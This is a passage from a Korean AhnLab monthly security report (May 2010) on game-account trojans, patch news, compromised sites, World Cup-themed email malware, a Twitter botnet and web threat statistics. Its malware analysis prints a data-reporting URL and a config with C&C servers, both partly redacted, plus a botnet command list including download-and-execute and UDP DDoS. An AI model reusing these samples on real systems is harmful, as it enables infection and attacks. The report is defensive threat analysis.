์˜จ๋ผ์ธ ๊ฒŒ์ž„ํ•ต ๋ฅ˜ ์•…์„ฑ์ฝ”๋“œ๋กœ ์ธํ•œ ํ•œ/์˜ ์ „ํ™˜ ๋ถˆ๊ฐ€ ์‚ฌ๋ก€

์ตœ๊ทผ ๊ตญ๋‚ด ์›น์‚ฌ์ดํŠธ๋ฅผ ํ†ตํ•ด ์œ ํฌ๋˜๋Š” ์˜จ๋ผ์ธ ๊ฒŒ์ž„ํ•ต์ด ๋งŽ์ด ์œ ํฌ๋˜๊ณ  ์žˆ

๋‹ค. ํ•ด๋‹น ์•…์„ฑ์ฝ”๋“œ๋Š” ๊ฒŒ์ž„ ๊ณ„์ •์„ ํƒˆ์ทจํ•˜๋Š” ๋ชฉ์ ์„ ์ง€๋‹Œ ์•…์„ฑ์ฝ”๋“œ๋กœ ์ตœ

๊ทผ ํ•ด๋‹น ์•…์„ฑ์ฝ”๋“œ์— ๊ฐ์—ผ๋  ๊ฒฝ์šฐ imm32.dll ํŒŒ์ผ์ด ๋ณ€์กฐ๋˜์–ด ํ•œ/์˜ ์ „ํ™˜

์ด ๋ถˆ๊ฐ€๋Šฅํ•œ ์ฆ์ƒ์ด ๋ฐœ๊ฒฌ๋˜๊ณ  ์žˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ฆ์ƒ์ด ๋‚˜ํƒ€๋‚  ๊ฒฝ์šฐ ์•…์„ฑ์ฝ”

๋“œ์— ๊ฐ์—ผ๋œ ๊ฒƒ์œผ๋กœ ์˜์‹ฌํ•ด ๋ณด์•„์•ผ ํ•˜๋ฉฐ, V3 ์ œํ’ˆ์„ ์„ค์น˜ํ•˜์—ฌ ์—”์ง„์„ ์ตœ

์‹ ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธ ํ•œ ํ›„ ๊ฒ€์‚ฌ ๋ฐ ์น˜๋ฃŒ๋ฅผ ๊ถŒ์žฅํ•œ๋‹ค. ๋งŒ์•ฝ ์ˆ˜๋™์œผ๋กœ ์กฐ

์น˜ํ•˜๊ณ ์ž ํ•œ๋‹ค๋ฉด http://core.ahnlab.com/173 ํŽ˜์ด์ง€๋ฅผ ์ฐธ๊ณ ํ•˜์—ฌ ์กฐ์น˜

ํ•˜๊ธฐ ๋ฐ”๋ž€๋‹ค.

Page 7: 01 - AhnLab, Inc

์„ธ์ƒ์—์„œ ๊ฐ€์žฅ ์•ˆ์ „ํ•œ ์ด๋ฆ„ ์•ˆ์ฒ ์ˆ˜์—ฐ๊ตฌ์†Œ 05

[๊ทธ๋ฆผ 2-1] ๊ณต๊ฒฉ ๋Œ€์ƒ ๊ธฐ์ค€ ๋ณ„ MS ๋ณด์•ˆ ์—…๋ฐ์ดํŠธ[๊ทธ๋ฆผ 2-3] ์•…์„ฑ์ฝ”๋“œ ๋ฐฐํฌ๋ฅผ ์œ„ํ•ด ์‚ฌ์šฉ๋œ ์ทจ์•ฝ์ 

[๊ทธ๋ฆผ 2-2] ์•…์„ฑ์ฝ”๋“œ ๋ฐฐํฌ๋ฅผ ์œ„ํ•ด ์นจํ•ด๋œ ์‚ฌ์ดํŠธ / ๋ฐฐํฌ์ง€ ์ˆ˜

[ํ‘œ 2-1] 2010๋…„ 5์›” ์ฃผ์š” MS ๋ณด์•ˆ ์—…๋ฐ์ดํŠธ

5์›”์—๋Š” 4์›”์— ๋ฐœํ‘œ๋œ 11๊ฑด๋ณด๋‹ค ํ›จ์”ฌ ์ ์€ 2๊ฑด์˜ ํŒจ์น˜๊ฐ€ ๋ฐœํ‘œ๋˜์—ˆ๋‹ค. ์ด

๋ฒˆ์— ๋ฐœํ‘œ๋œ MS10-030 (์œˆ๋„์šฐ ๋ฉ”์ผ ์ทจ์•ฝ์  ์›๊ฒฉ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ )์€

์‚ฌ์šฉ์ž๊ฐ€ ์•…์˜์ ์ธ ๋ฉ”์ผ ์„œ๋ฒ„์— ๋ฐฉ๋ฌธํ•˜๋„๋ก ์œ ๋„ํ•˜์—ฌ ์ž„์˜์˜ ์ฝ”๋“œ๋ฅผ ์‹ค

ํ–‰ํ•˜๋„๋ก ํ•œ๋‹ค. ๋น„์ฃผ์–ผ ๋ฒ ์ด์ง ์ทจ์•ฝ์ ์€ VBA(Visual Basic for Applica-

tions)๋ฅผ ์ง€์›ํ•˜๋Š” ๋ฌธ์„œ์—์„œ ActiveX ์ปจํŠธ๋กค์„ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐฉ์‹์œผ๋กœ ์ธํ•ด

๋ฐœ์ƒํ•œ๋‹ค. ํŠน์ˆ˜ํ•˜๊ฒŒ ์กฐ์ž‘๋œ ๋ฌธ์„œ๋ฅผ VBA ๋Ÿฐํƒ€์ž„์œผ๋กœ ์ „๋‹ฌํ•˜๋ฉด ์ž„์˜์˜ ์ฝ”

๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์กฐ๊ฑด์ด ๋งŒ๋“ค์–ด์ง„๋‹ค. ์ด๋ฒˆ ๋‹ฌ์— ๋ฐœํ‘œ๋œ ๋ณด์•ˆํŒจ์น˜๋Š”

์›๊ฒฉ์ฝ”๋“œ ์‹คํ–‰์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š” ๋งŒํผ ํ•ด๋‹น ์ œํ’ˆ์„ ์‚ฌ์šฉ ์ค‘์ด๋ผ๋ฉด ๋น ๋ฅธ

ํŒจ์น˜๋ฅผ ๊ถŒ๊ณ ํ•œ๋‹ค.

์•…์„ฑ์ฝ”๋“œ ์นจํ•ด ์›น์‚ฌ์ดํŠธ ํ˜„ํ™ฉ

[๊ทธ๋ฆผ 2-2]๋Š” ์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ ์นจํ•ด ์‚ฌ์ดํŠธ ํ˜„ํ™ฉ์„ ๋‚˜ํƒ€๋‚ธ ๊ทธ๋ž˜ํ”„๋กœ, 2010

๋…„ 1์›”๋ถ€ํ„ฐ 4์›”๊นŒ์ง€ ๊พธ์ค€ํžˆ ์ฆ๊ฐ€ํ•˜๋‹ค๊ฐ€ 5์›”์— ๋‹ค์†Œ ๊ฐ์†Œํ•˜์˜€๋‹ค. 5์›”์—๋„

์ง€๋‚œ 4์›”๊ณผ ๋น„์Šทํ•˜๊ฒŒ ์นจํ•ด ์‚ฌ์ดํŠธ๋ฅผ ํ†ตํ•ด์„œ ์œ ํฌ๋˜๋Š” ์•…์„ฑ์ฝ”๋“œ์˜ ๋Œ€๋ถ€๋ถ„

์€ Win-Trojan/Daonol ๋ณ€์ข…๋“ค์ด์—ˆ๋‹ค.

[๊ทธ๋ฆผ 2-3]์€ ์›”๋ณ„ ์นจํ•ด์‚ฌ๊ณ ๊ฐ€ ๋ฐœ์ƒํ•œ ์›น์‚ฌ์ดํŠธ๋“ค์—์„œ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์œ ํฌ

ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์‚ฌ์šฉํ–ˆ๋˜ ์ทจ์•ฝ์ ๋“ค์— ๋Œ€ํ•œ ํ†ต๊ณ„๋กœ, ์ „์›”๊ณผ ๋™์ผํ•˜๊ฒŒ MS06-

014 ์ทจ์•ฝ์ ์„ ์‚ฌ์šฉํ•œ ์•…์„ฑ์ฝ”๋“œ ์œ ํฌ๊ฐ€ ๊ฐ€์žฅ ๋งŽ์•˜๋‹ค. ๊ทธ๋ฆฌ๊ณ  ์ทจ์•ฝ์  ID์—

์„œ๋„ ๋ณผ ์ˆ˜ ์žˆ๋“ฏ์ด MS06-014๋Š” 2006๋…„๋„์— ๋ฐœ๊ฒฌ๋œ ์ทจ์•ฝ์ ์ธ๋ฐ ๊ฐ€์žฅ

๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ๊ฒƒ์„ ๋ณผ ๋•Œ ์•„์ง๋„ ๋งŽ์€ Internet Explorer์‚ฌ์šฉ์ž๋“ค์ด ๋ณด์•ˆ

ํŒจ์น˜๋ฅผ ์ ์šฉํ•˜์ง€ ์•Š๊ณ  ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” ๊ฒƒ์œผ๋กœ ํŒ๋‹จ๋œ๋‹ค.

์‹œํ๋ฆฌํ‹ฐ ์ด์Šˆ

๋‚จ์•„๊ณต์›”๋“œ์ปต์„ ์œ„์žฅํ•œ ์•…์„ฑ์ฝ”๋“œ ๊ตญ๋‚ด๋ฐœ๊ฒฌ

2010๋…„ ๋‚จ์•„๊ณต ์›”๋“œ์ปต์„ ์•ž๋‘๊ณ  ์ด๋ฅผ ์•…์šฉํ•œ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ณด๊ณ ๋˜์—ˆ๋‹ค. ์ด

๋ฒˆ์— ๋ณด๊ณ ๋œ ์•…์„ฑ์ฝ”๋“œ๋Š” ํ•œ๊ธ€๋กœ ์ž‘์„ฑ๋œ ์ด๋ฉ”์ผ์„ ํ†ตํ•ด ์ „ํŒŒ๊ฐ€ ๋˜๋Š” ํŠน์ง•

์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค. ์˜ฌ 3์›”์— ์›”๋“œ์ปต ๊ด€๋ จ ๋ฉ”์ผ๋กœ ์œ„์žฅํ•œ ์ŠคํŒธ๋ฉ”์ผ์ด ์œ ํฌ๊ฐ€

๋˜์—ˆ์ง€๋งŒ, ๊ทธ ๋‹น์‹œ์—๋Š” ์˜๋ฌธ์ด์—ˆ๋‹ค. ์ด๋ฒˆ์— ํ•œ๊ตญ์–ด๋กœ ์œ„์žฅํ•œ ๋ฉ”์ผ์€ ์ œ๋ชฉ

์ด โ€œ๋‚จ์•„๊ณต ์›”๋“œ์ปต ์ง์ ‘ ๋ณผ ์ˆ˜ ์žˆ๋‹ค!โ€ ์™€ ๊ฐ™์ด ์‚ฌ์šฉ์ž๋ฅผ ํ˜„ํ˜นํ•˜๋Š” ๋ฌธ๊ตฌ

๋ฅผ ์ด์šฉํ•˜์˜€๋‹ค. ์ง€๊ธˆ๊นŒ์ง€ ๋ณด๋ฉด ์ค‘์š”ํ•œ ํ–‰์‚ฌ๊ฐ€ ์žˆ์œผ๋ฉด ์–ด๊น€์—†์ด ๊ด€๋ จํ•œ ์•…

์„ฑ์ฝ”๋“œ๊ฐ€ ๋‚˜ํƒ€๋‚œ๋‹ค. ์ด์œ ๋ฅผ ์‚ดํŽด๋ณด๋ฉด, ์•„๋ฌด๋ž˜๋„ ์‚ฌํšŒ์  ๊ด€์‹ฌ์ด ๋†’๊ธฐ ๋•Œ๋ฌธ

์— ์‚ฌ์šฉ์ž๋“ค์ด ์•…์„ฑ๋ฉ”์ผ์„ ์—ด์–ด๋ณผ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’๋‹ค๋Š” ์ ์„ ์•…์šฉํ•˜๋Š” ๊ฒƒ์œผ

๋กœ ๋ณด์ธ๋‹ค. ์ง€๊ธˆ๋ถ€ํ„ฐ ํ•ด๋‹น ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ดํŽด๋ณด์ž. ๋จผ์ €, ์•…์„ฑ๋ฉ”์ผ์— ์ฒจ๋ถ€

๋œ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋ฉด, ์‹œ์Šคํ…œ์˜ MAC ์ฃผ์†Œ์™€ P2P ํ”„๋กœ๊ทธ๋žจ์ธ ํ”„๋ฃจ๋‚˜์™€ ์ด

๋ฎฌ์˜ ํ”„๋กœ๊ทธ๋žจ ์„ค์น˜ ์ •๋ณด๋ฅผ ์ „์†กํ•œ๋‹ค.

[์š”์ฒญ์ •๋ณด]

- ์ •๋ณด์ „์†ก URL :

http://www.pa[์‚ญ์ œ]m/v1.0/cmd.php?mac_addr=000c2[์‚ญ์ œ]c&ver=20

100501&prunaInstall=0&emulInstall=0

์ •๋ณด๋ฅผ ์ „์†กํ•˜๋Š” ๊ณณ์€ IP๊ฐ€ ํ•œ๊ตญ์— ์œ„์น˜ํ•œ ์‹œ์Šคํ…œ์ด๋‹ค. ์œ„ ์ •๋ณด ์™ธ์—๋„ ๋ช‡

๊ตฐ๋ฐ๋ฅผ ์ ‘์†ํ•˜๋Š”๋ฐ IP ๋Œ€์—ญ ๋ชจ๋‘๊ฐ€ ํ•œ๊ตญ์— ์œ„์น˜ํ•œ ๊ณณ์ด๋‹ค. ์ผ๋‹จ ์ •๋ณด๋ฅผ ์ „

์†กํ•˜๋ฉด ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฉ”์ผ ๋ฐœ์†ก๊ณผ ๊ด€๋ จํ•œ ๊ณต๊ฒฉ์ •๋ณด๋ฅผ ์ „๋‹ฌ๋ฐ›๋Š”๋‹ค. ์ „๋‹ฌ๋˜

๋Š” ๋‚ด์šฉ ํ˜•ํƒœ๋Š” ์•„๋ž˜์™€ ๊ฐ™๋‹ค.

Page 8: 01 - AhnLab, Inc

06 ASEC Report _ 2010. Vol.05

์†Œ์…œ ๋„คํŠธ์›Œํฌ์˜ ๋Œ€ํ‘œ, ํŠธ์œ„ํ„ฐ(Twitter)๋ฅผ ์ด์šฉํ•œ ๋ด‡๋„ท ์ฆ๊ฐ€ ์šฐ๋ ค

๋Œ€ํ‘œ์ ์ธ ์†Œ์…œ ๋„คํŠธ์›Œํฌ๋ฅผ ๋ฝ‘์œผ๋ผ ํ•˜๋ฉด, ํŠธ์œ„ํ„ฐ๊ฐ€ ๋น ์งˆ ์ˆ˜ ์—†๋‹ค. ๊ตญ๋‚ด์—

์„œ๋„ ํŠธ์œ„ํ„ฐ์˜ ์‚ฌ์šฉ์ž์ธต์ด ๋‘ํ„ฐ์›Œ ์ง€๊ณ  ์žˆ์œผ๋ฉฐ, ๊ฐœ์ธ ๋ฟ ์•„๋‹ˆ๋ผ ๊ธฐ์—…์—

์„œ๋„ ๋งˆ์ผ€ํŒ…, ํ™๋ณด์šฉ๋„๋กœ๋„ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ๋‹ค. ๊ทธ๋Ÿฐ๋ฐ ์ด ํŠธ์œ„ํ„ฐ๊ฐ€ ๋ด‡๋„ท์œผ๋กœ

์ด์šฉ๋˜๊ณ  ์žˆ์œผ๋ฉฐ, ์™ธ๊ตญ์—์„œ๋Š” ์ ์ฐจ ์ด์Šˆํ™”๋˜๊ณ  ์žˆ๋‹ค๊ณ  ํ•œ๋‹ค. ์šฐ์„  ๊ณต๊ฒฉ

์ž๋Š” ํŠธ์œ„ํ„ฐ ๊ณ„์ •์„ ์ƒ์„ฑํ•˜๊ฑฐ ๋‚˜ ๋˜๋Š” ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ๊ฒƒ์„ ๋„์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์„

์ค€๋น„ํ•œ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ์‚ฌ์šฉ์ž์—๊ฒŒ๋Š” ์ „์†กํ•œ ํŒŒ์ผ์ด๋‚˜ URL์ฃผ์†Œ๋ฅผ ์‚ฌํšŒ๊ณตํ•™์ 

์ธ ๋ฐฉ๋ฒ•์„ ์ด์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๊ฐ€ ํด๋ฆญํ•˜๋„๋ก ์œ ๋„ํ•œ๋‹ค. ๋งŒ์•ฝ ์‚ฌ์šฉ์ž๊ฐ€ ํŒŒ์ผ

์„ ํด๋ฆญํ•˜๋ฉด ํ•ด๋‹น ์•…์„ฑ์ฝ”๋“œ์— ๊ฐ์—ผ์ด ๋˜๋ฉด์„œ ์‚ฌ์ „ ์ •์˜๋œ ํŠธ์œ„ํ„ฐ์— ์ ‘์†

์„ ์‹œ๋„ํ•˜๊ฒŒ ๋œ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ด๋•Œ ํŠธ์œ„ํ„ฐ์— ๊ณต๊ฒฉ๋ช…๋ น์„ ํŠธ์œ—ํ•˜๋Š” ๊ฒƒ๋งŒ์œผ

๋กœ ์‰ฝ๊ฒŒ ์ œ์–ด๋ฅผ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค. ์ ‘์†๋ฐฉ์‹์ด ํŠธ์œ„ํ„ฐ๋ฅผ ์ด์šฉํ•œ ํ˜•ํƒœ๊ฐ€ ๋˜

์—ˆ๋‹ค๋Š” ๊ฒƒ์ด์ง€, ๊ณผ๊ฑฐ์˜ IRC ์ฑ„๋„์„ ์ด์šฉํ•œ ๊ฒƒ๊ณผ๋Š” ๋ฐฐ๊ฒฝ ๋ฉด์—์„œ ํฐ ์ฐจ์ด์ 

์€ ์—†๋‹ค. ํŠธ์œ„ํ„ฐ๋ฅผ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๋ช…๋ น ํ˜•ํƒœ๋ฅผ ๋ณด๋ฉด ์•„๋ž˜์™€ ๊ฐ™๋‹ค:

[๊ทธ๋ฆผ 2-4] ํŠธ์œ„ํ„ฐ ๋ด‡์„ ์ƒ์„ฑํ•˜๋Š” ๋„๊ตฌ ํ™”๋ฉด ์˜ˆ์ œ

์œ„์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ด‡์„ ์ƒ์„ฑํ•˜๊ฒŒ ๋˜๋ฉด ํŒŒ์ผ ๋๋ถ€๋ถ„์— ๋‹ค์Œ ํ™”๋ฉด

๊ณผ ๊ฐ™์ด ์ž…๋ ฅํ•œ ํŠธ์œ„ํ„ฐ ์ •๋ณด๊ฐ€ ๋“ค์–ด๊ฐ€ ์žˆ์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

<mailFileName><![CDATA[favorite.exe]]></mailFileName>

<mailSendTerm>43200000</mailSendTerm>

<mailSendMax>200</mailSendMax>

<mailRepeat>2</mailRepeat>

<CmdServer>http://www.pa[์‚ญ์ œ]s.com/v1.0/cmd.php</CmdServer>

<CmdServer1>http://www.k[์‚ญ์ œ]om/v1.0/cmd.php</CmdServer1>

<CmdServer2>http://www.k[์‚ญ์ œ]8.com/v1.0/cmd.php</CmdServer2>

<CmdUpdateTime>300000</CmdUpdateTime>

<delayWindow>100000</delayWindow>

<CntWindow>1</CntWindow>

<ifRandom>1</ifRandom>

</CONFIG>

์ฆ‰, ๋ช…๋ น์„ ๋‚ด๋ฆฌ๋Š” ๊ณณ์€ 3๊ตฐ๋ฐ์˜ C&C ์„œ๋ฒ„๊ฐ€ ์žˆ๋Š” ๊ฒƒ์ž„์„ ๋Œ€๋žต ์ถ”์ •ํ•ด

๋ณผ ์ˆ˜ ์žˆ๋‹ค. ๊ธฐ์—…๋“ค์—์„œ๋Š” ๋ณดํ†ต ์›น ์ ‘์†์ด ๋ฐฉํ™”๋ฒฝ์—์„œ ๋งŽ์ด ํ—ˆ์šฉ๋˜์–ด ์žˆ๋Š”

๋งŒํผ, ์•…์„ฑ์ฝ”๋“œ์˜ ์›๊ฒฉ์ œ์–ด ๋ฐฉ์‹์œผ๋กœ HTTP ํ”„๋กœํ† ์ฝœ์„ ์ด์šฉํ•˜์—ฌ ์ •๋ณด๋ฅผ

์ฃผ๊ณ ๋ฐ›๋Š” ํ˜•ํƒœ๊ฐ€ ๋Œ€์„ธ์ด๋‹ค. ๊ธฐ์ˆ ๋ฐœ์ „์— ๋”ฐ๋ผ ์ด๋Ÿฌํ•œ ์ ‘๊ทผ ๋ฐฉ์‹๋„ ๋ฐ”๋€Œ๊ฒ 

์ง€๋งŒ ์•ž์œผ๋กœ ๋‹น๋ถ„๊ฐ„์€ HTTP๊ฐ€ ์•…์„ฑ์ฝ”๋“œ์˜ ์ฃผ์š”ํ•œ ํ†ต์‹ ์ˆ˜๋‹จ์ด ๋  ๊ฒƒ์ด๋‹ค.

> .DOWNLOAD*link.com/direct.exe*cutomnamefor.exe*0 [ 0 = Download,

1 = > Download & Exec ]

> .DDOS*IP*PORT [ UDP Attack ]

> .VISIT*link.com/video*0 [ 0 = Invisible, 1 = Visible ]

> .SAY*Hello my infectants! [ Fun, useless command, Text To Speech ]

> .STOP [ Stops all current processes. DDOS, Visiting.]

> .REMOVEALL [ Removes all bots connected. ]

๊ณต๊ฒฉ ๋ช…๋ น์˜ ์˜ˆ์ œ๋งŒ ๋ณด์•„๋„ ๋Œ€์ถฉ ์ถ”์ธก์ด ๊ฐ€๋Šฅํ•  ๊ฒƒ์ด๋‹ค. ํŠน์ •ํ•œ URL ์ฃผ

์†Œ์—์„œ ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œ ๋ฐ›๊ฒŒ ํ•œ๋‹ค๋“ ์ง€ ํŠน์ •ํ•œ ์•„์ดํ”ผ๋กœ DDoS ๊ณต๊ฒฉ์„

์ˆ˜ํ–‰ํ•˜๊ฑฐ๋‚˜, ์‚ฌ์ดํŠธ ๋ฐฉ๋ฌธ ๋“ฑ ๋‹ค์–‘ํ•œ ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด ์‚ฌ์šฉ์ž์˜ ์ปดํ“จํ„ฐ๋ฅผ ์—ฌ

๋Ÿฌ ๊ฐ€์ง€ ๋ฐฉ๋ฒ•์œผ๋กœ ์ œ์–ดํ•  ์ˆ˜ ์žˆ๋‹ค.

[๊ทธ๋ฆผ 2-5] ์ƒ์„ฑ๋œ ๋ด‡ ํŒŒ์ผ์˜ ๋‚ด๋ถ€์ฝ”๋“œ

์ด์™ธ ์ธํ„ฐ๋„ท์—์„œ๋„ ์†Œ๊ฐœ๋˜๊ณ  ์žˆ๋Š” ๋˜ ๋‹ค๋ฅธ ํŠธ์œ„ํ„ฐ ๋ด‡์˜ ํ™”๋ฉด์€ ์•„๋ž˜์™€

๊ฐ™๋‹ค.

ํŠธ์œ„ํ„ฐ๊ฐ€ ๋Œ€์ค‘์ ์œผ๋กœ ์ด์šฉ๋˜๊ณ  ์žˆ๋Š” ๋งŒํผ ๊ณต๊ฒฉ์ž๋“ค์€ ํŠธ์œ„ํ„ฐ์™€ ๊ฐ™์€

SNS ํ™˜๊ฒฝ์„ ๊ณต๊ฒฉ์„ ์œ„ํ•œ ๋„๊ตฌ๋กœ ํ™œ์šฉํ•˜๋Š” ์‚ฌ๋ก€๊ฐ€ ๋Š˜์–ด๋‚˜๊ณ  ์žˆ๋‹ค. ์ด๋ฒˆ

ํŠธ์œ„ํ„ฐ ๋ด‡๋„ท์€ ์•ž์œผ๋กœ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” SNS๋ฅผ ์ด์šฉํ•œ ๊ณต๊ฒฉ์˜ ์‹œ์ž‘์ผ์ง€

๋„ ๋ชจ๋ฅธ๋‹ค.

[๊ทธ๋ฆผ 2-4] ํŠธ์œ„ํ„ฐ ๋ด‡์„ ์ƒ์„ฑํ•˜๋Š” ๋„๊ตฌ ํ™”๋ฉด ์˜ˆ์ œ

์ด๋ฏธ ํŠธ์œ„ํ„ฐ ๋ด‡๋„ท์„ ์ƒ์„ฑํ•˜๋Š” ๋„๊ตฌ๋„ ๋‚˜์™€ ์žˆ์–ด, ํŠธ์œ„ํ„ฐ ๋ด‡๋„ท ํ”„๋กœ๊ทธ๋žจ์„

์‰ฝ๊ฒŒ ์ƒ์„ฑํ•  ์ˆ˜๊ฐ€ ์žˆ๋‹ค.

AhnLab Trusguard

Page 9: 01 - AhnLab, Inc

์„ธ์ƒ์—์„œ ๊ฐ€์žฅ ์•ˆ์ „ํ•œ ์ด๋ฆ„ ์•ˆ์ฒ ์ˆ˜์—ฐ๊ตฌ์†Œ 07

[ํ‘œ 3-1] ์›น ์‚ฌ์ดํŠธ ๋ณด์•ˆ ์š”์•ฝ

์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ ๊ฑด์ˆ˜๋Š”

142,613๊ฑด์ด๊ณ , ์•…์„ฑ

์ฝ”๋“œ ์œ ํ˜•์€ 930๊ฑด์ด

๋ฉฐ, ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ

๋œ ๋„๋ฉ”์ธ์€ 1,084๊ฑด

์ด๋ฉฐ, ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ๋œ

URL์€ 4,950 ๊ฑด์ด๋‹ค.

2010๋…„ 5์›”์€ 2010๋…„

4์›”๋ณด๋‹ค ์€ ๋‹ค์†Œ ๊ฐ์†Œ

3. ์›น ๋ณด์•ˆ ๋™ํ–ฅ

์›น ๋ณด์•ˆ ํ†ต๊ณ„

์›น ์‚ฌ์ดํŠธ ๋ณด์•ˆ ์š”์•ฝ

์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ ๊ฑด์ˆ˜

[๊ทธ๋ฆผ 3-1] ์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ ๊ฑด์ˆ˜

ํ•˜์˜€์œผ๋‚˜, ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ ๊ฑด์ˆ˜, ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•, ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ ๋„๋ฉ”

์ธ, ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ๋œ URL ์€ ์ฆ๊ฐ€ํ•˜์˜€๋‹ค.

2010๋…„ 5์›” ์•…์„ฑ์ฝ”๋“œ ๋ฐœ๊ฒฌ ๊ฑด์ˆ˜๋Š” ์ „๋‹ฌ์˜ 111,045๊ฑด์— ๋น„ํ•ด 128% ์ˆ˜

์ค€์ธ 142,613๊ฑด์ด๋‹ค.

์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•

[๊ทธ๋ฆผ 3-2] ์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•

2010๋…„ 5์›” ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•์€ ์ „๋‹ฌ์˜ 926๊ฑด์— ๋น„ํ•ด 100% ์ˆ˜์ค€์ธ 930

๊ฑด์ด๋‹ค.

[๊ทธ๋ฆผ 3-3] ์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ ๋„๋ฉ”์ธ

์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ ๋„๋ฉ”์ธ

2010๋…„ 5์›” ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ ๋„๋ฉ”์ธ์€ ์ „๋‹ฌ์˜ 1,028๊ฑด์— ๋น„ํ•ด 105%

์ˆ˜์ค€์ธ 1,084๊ฑด์ด๋‹ค.

์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ URL

[๊ทธ๋ฆผ 3-4] ์›”๋ณ„ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ URL

2010๋…„ 5์›” ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋ฐœ๊ฒฌ๋œ URL์€ ์ „๋‹ฌ์˜ 3,898๊ฑด์— ๋น„ํ•ด 127% ์ˆ˜

์ค€์ธ 4,950๊ฑด์ด๋‹ค.

์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ฐฐํฌ ์ˆ˜

[ํ‘œ 3-2] ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ฐฐํฌ ์ˆ˜

Page 10: 01 - AhnLab, Inc

08 ASEC Report _ 2010. Vol.05

[๊ทธ๋ฆผ 3-5] ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ฐฐํฌ ์ˆ˜

์•…์„ฑ์ฝ”๋“œ ๋ฐฐํฌ Top 10

์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ฐฐํฌ ์ˆ˜์—์„œ ์• ๋“œ์›จ์–ด(ADWARE)๋ฅ˜๊ฐ€ 86,027๊ฑด ์ „์ฒด์˜

60.3%๋กœ 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€์œผ๋ฉฐ, ํŠธ๋กœ์ž”(TROJAN)๋ฅ˜๊ฐ€ 13,297๊ฑด์œผ๋กœ ์ „์ฒด

์˜ 9.3%๋กœ 2์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€๋‹ค.

[ํ‘œ 3-3] ์•…์„ฑ์ฝ”๋“œ ๋ฐฐํฌ Top 10

์›น ๋ณด์•ˆ ์ด์Šˆ

๊ตฌ๊ธ€ ๊ทธ๋ฃน์Šค(Google Groups)์™€ ์ŠคํŒธ๋ฉ”์ผ์ด ๊ฒฐํ•ฉ๋œ ์•…์„ฑ์ฝ”๋“œ

์ตœ๊ทผ ํฌํ„ธ ์‚ฌ์ดํŠธ์—์„œ ํ›Œ๋ฅญํ•œ ์ธํ”„๋ผ๋กœ ๋ฌด์žฅ๋œ ์•ˆ์ •์ ์ด๊ณ  ํŽธ๋ฆฌํ•œ ์„œ๋น„

์Šค๋ฅผ ๋งŽ์ด ์ œ๊ณตํ•˜๊ณ  ์žˆ๋‹ค. ๋ฌด๋ฃŒ๋กœ ์ด์šฉํ•  ๊ฒฝ์šฐ์—๋Š” ์šฉ๋Ÿ‰ ์ œํ•œ ๋“ฑ์ด ์žˆ์ง€

